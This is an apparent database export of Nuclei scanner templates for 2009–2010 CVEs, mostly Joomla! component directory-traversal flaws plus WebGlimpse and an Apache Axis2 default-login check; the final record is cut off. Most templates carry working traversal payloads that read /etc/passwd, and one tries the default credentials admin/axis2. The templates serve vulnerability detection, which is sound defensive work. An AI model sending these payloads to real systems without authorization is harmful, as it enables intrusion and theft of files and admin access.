"66477a413521042ccf307e63" }, "name": "CVE-2009-5114.yaml", "content": "id: CVE-2009-5114\n\ninfo:\n name: WebGlimpse 2.18.7 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.\n impact: |\n An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/36994\n - https://nvd.nist.gov/vuln/detail/CVE-2009-5114\n - http://websecurity.com.ua/2628/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-5114\n cwe-id: CWE-22\n epss-score: 0.01329\n epss-percentile: 0.85735\n cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: iwork\n product: webglimpse\n tags: cve,cve2009,edb,lfi,iwork\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205f1bc3fae0095bf323e677c3c93b6cdb42d839f3084ee12f9fe92a0dab609269022100b70a69e966f2e410ba5d8ed821edf339feb20ee4149b37bd66992153e4a341ee:922c64590222798bb761d5b6d8e72950", "hash": "be50ae120dc016b4f0f018b6dfd05cb6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e64" }, "name": "CVE-2010-0157.yaml", "content": "id: CVE-2010-0157\n\ninfo:\n name: Joomla! Component com_biblestudy - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/10943\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0157\n - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0157\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve2010,cve,joomla,lfi,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950", "hash": "1d45afd156993453990adb865766a13e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e65" }, "name": "CVE-2010-0219.yaml", "content": "id: CVE-2010-0219\n\ninfo:\n name: Apache Axis2 Default Login\n author: pikpikcu\n severity: critical\n description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.\n remediation: |\n Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0219\n - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html\n - http://www.rapid7.com/security-center/advisories/R7-0037.jsp\n - http://www.vupen.com/english/advisories/2010/2673\n - http://retrogod.altervista.org/9sg_ca_d2d.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2010-0219\n cwe-id: CWE-255\n epss-score: 0.97509\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: axis2\n shodan-query: http.html:\"Apache Axis\"\n tags: cve,cve2010,axis,apache,default-login,axis2\n\nhttp:\n - raw:\n - |\n POST /axis2-admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n loginUsername={{username}}&loginPassword={{password}}\n - |\n POST /axis2/axis2-admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n userName={{username}}&password={{password}}&submit=+Login+\n\n payloads:\n username:\n - admin\n password:\n - axis2\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"

Welcome to Axis2 Web Admin Module !!

\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950", "hash": "2f446a4c2f098302cd95df17a93edf70", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e66" }, "name": "CVE-2010-0467.yaml", "content": "id: CVE-2010-0467\n\ninfo:\n name: Joomla! Component CCNewsLetter - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Apply all relevant security patches and upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11282\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0467\n - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html\n - http://www.exploit-db.com/exploits/11277\n - http://www.exploit-db.com/exploits/11282\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\n cvss-score: 5.8\n cve-id: CVE-2010-0467\n cwe-id: CWE-22\n epss-score: 0.06955\n epss-percentile: 0.93792\n cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chillcreations\n product: com_ccnewsletter\n tags: cve2010,cve,joomla,lfi,edb,chillcreations\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950", "hash": "97e8400d19840436bd69a87ca0232e07", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e67" }, "name": "CVE-2010-0696.yaml", "content": "id: CVE-2010-0696\n\ninfo:\n name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to retrieve arbitrary files from the server.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11447\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0696\n - http://www.joomlaworks.gr/content/view/77/34/\n - http://www.exploit-db.com/exploits/11447\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0696\n cwe-id: CWE-22\n epss-score: 0.57303\n epss-percentile: 0.97418\n cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlaworks\n product: jw_allvideos\n tags: cve2010,cve,joomla,lfi,edb,joomlaworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022062ed8cccf9ce298ba49005eb279ab8323d07a0560df9ee8857a3d007a3468fd6022025dbbd9a0d7b3ef88719e19a69fbb605dc7e77c1b087598f560b22547b2431d3:922c64590222798bb761d5b6d8e72950", "hash": "d8c0c1c24997976c3a49e32c48052e90", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e68" }, "name": "CVE-2010-0759.yaml", "content": "id: CVE-2010-0759\n\ninfo:\n name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11498\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0759\n - http://www.exploit-db.com/exploits/11498\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0759\n cwe-id: CWE-22\n epss-score: 0.01569\n epss-percentile: 0.86974\n cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: greatjoomla\n product: scriptegrator_plugin\n tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950", "hash": "5e63e8a8fd2a135bfa12b9f04cafcf7d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e69" }, "name": "CVE-2010-0942.yaml", "content": "id: CVE-2010-0942\n\ninfo:\n name: Joomla! Component com_jvideodirect - Directory Traversal\n author: daffainfo\n severity: medium\n description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11089\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0942\n - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0942\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jvideodirect\n product: com_jvideodirect\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950", "hash": "d8c2a651f0fedecf7a2bfe1681e1df3f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6a" }, "name": "CVE-2010-0943.yaml", "content": "id: CVE-2010-0943\n\ninfo:\n name: Joomla! Component com_jashowcase - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11090\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0943\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55512\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0943\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83338\n cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlart\n product: com_jashowcase\n tags: cve,cve2010,joomla,lfi,edb,joomlart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022005106e04d767db02ba9579ef3494c0b2d5753a5b8f86e4ad943211172eb7b81f022100d1852cc2c4587931f40081345b3884b5e96af7f4bd8c0091b8846faed5490f1b:922c64590222798bb761d5b6d8e72950", "hash": "5f72802d4b5ea15f0599dba3a805f2f7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6b" }, "name": "CVE-2010-0944.yaml", "content": "id: CVE-2010-0944\n\ninfo:\n name: Joomla! Component com_jcollection - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11088\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0944\n - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt\n - http://www.exploit-db.com/exploits/11088\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0944\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thorsten_riess\n product: com_jcollection\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203edf2b86718735a85d6b60ac6465e0d7f9aa063bbfb985ecba7fd8a82500bcc6022100a9017abad716d08a60243fdb71aed727e1b0bc2e44c3d591e200168e9f7bc182:922c64590222798bb761d5b6d8e72950", "hash": "0fa2397d5a70864af65b65170a919818", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6c" }, "name": "CVE-2010-0972.yaml", "content": "id: CVE-2010-0972\n\ninfo:\n name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11738\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0972\n - http://www.exploit-db.com/exploits/11738\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0972\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: g4j.laoneo\n product: com_gcalendar\n tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950", "hash": "274566e41a38b831348f3246e1487f26", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6d" }, "name": "CVE-2010-0982.yaml", "content": "id: CVE-2010-0982\n\ninfo:\n name: Joomla! Component com_cartweberp - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/10942\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0982\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-0982\n cwe-id: CWE-22\n epss-score: 0.0087\n epss-percentile: 0.80553\n cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlamo\n product: com_cartweberp\n tags: cve2010,cve,joomla,lfi,edb,joomlamo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205938263a02a9a36a6233aad621dcf2594c70bf868c9ccb51b37a2b5a55a22859022100f0c21b9c2a268b13bbc95dbc3e86f6e0488338965b090161ec90ebcff75bf975:922c64590222798bb761d5b6d8e72950", "hash": "4ad41d93e2e3c8cbf20ec9705f3e2372", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6e" }, "name": "CVE-2010-0985.yaml", "content": "id: CVE-2010-0985\n\ninfo:\n name: Joomla! Component com_abbrev - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/10948\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0985\n - http://www.exploit-db.com/exploits/10948\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0985\n cwe-id: CWE-22\n epss-score: 0.01222\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chris_simon\n product: com_abbrev\n tags: cve,cve2010,joomla,lfi,edb,chris_simon\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bca78e57f920f69e926e7fda61bfc9c1081621b67537c840fd5c4998a6e760b6022100bd476afda728ebf5fd521130fb22289a8aa64372043a3c537b90a9b626ad34f6:922c64590222798bb761d5b6d8e72950", "hash": "af3f9add917b432a29ee01917c0b4b83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6f" }, "name": "CVE-2010-1056.yaml", "content": "id: CVE-2010-1056\n\ninfo:\n name: Joomla! Component com_rokdownloads - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11760\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1056\n - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1056\n cwe-id: CWE-22\n epss-score: 0.06484\n epss-percentile: 0.93567\n cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rockettheme\n product: com_rokdownloads\n tags: cve,cve2010,joomla,lfi,edb,rockettheme\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063751b0bb22265abceda515f563474e54ddd0bb7bf04addcfc369c1a3c21f69c022100a2bdd7c3930a8da95f5c7e7d673fae8b107d53fd646041880a655aa9249b1ec1:922c64590222798bb761d5b6d8e72950", "hash": "55ad16540a380c3e0db2f604f8173d4d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e70" }, "name": "CVE-2010-1081.yaml", "content": "id: CVE-2010-1081\n\ninfo:\n name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11511\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1081\n - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1081\n cwe-id: CWE-22\n epss-score: 0.0168\n epss-percentile: 0.8632\n cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: corejoomla\n product: com_communitypolls\n tags: cve,cve2010,joomla,lfi,edb,corejoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950", "hash": "07f3e5d82b49e804e8a91769ecc769f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e71" }, "name": "CVE-2010-1217.yaml", "content": "id: CVE-2010-1217\n\ninfo:\n name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11814\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1217\n - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt\n - http://www.exploit-db.com/exploits/11814\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2010-1217\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.84543\n cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: je_form_creator\n product: je_form_creator\n tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201a816ac69e3484194480569546383ac95a39384b1b81b2edcca4f7d78766e49d022100b824268cecc97ebb54940329e54d6aa376f07f1fb432068386894a744808661d:922c64590222798bb761d5b6d8e72950", "hash": "97e806776aa997069f6d18bac7d4e53e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e72" }, "name": "CVE-2010-1219.yaml", "content": "id: CVE-2010-1219\n\ninfo:\n name: Joomla! Component com_janews - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11757\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1219\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1219\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: com_janews\n product: com_janews\n tags: cve,cve2010,joomla,lfi,edb,com_janews\n\nhttp:\n - method: GET\n path:\n - 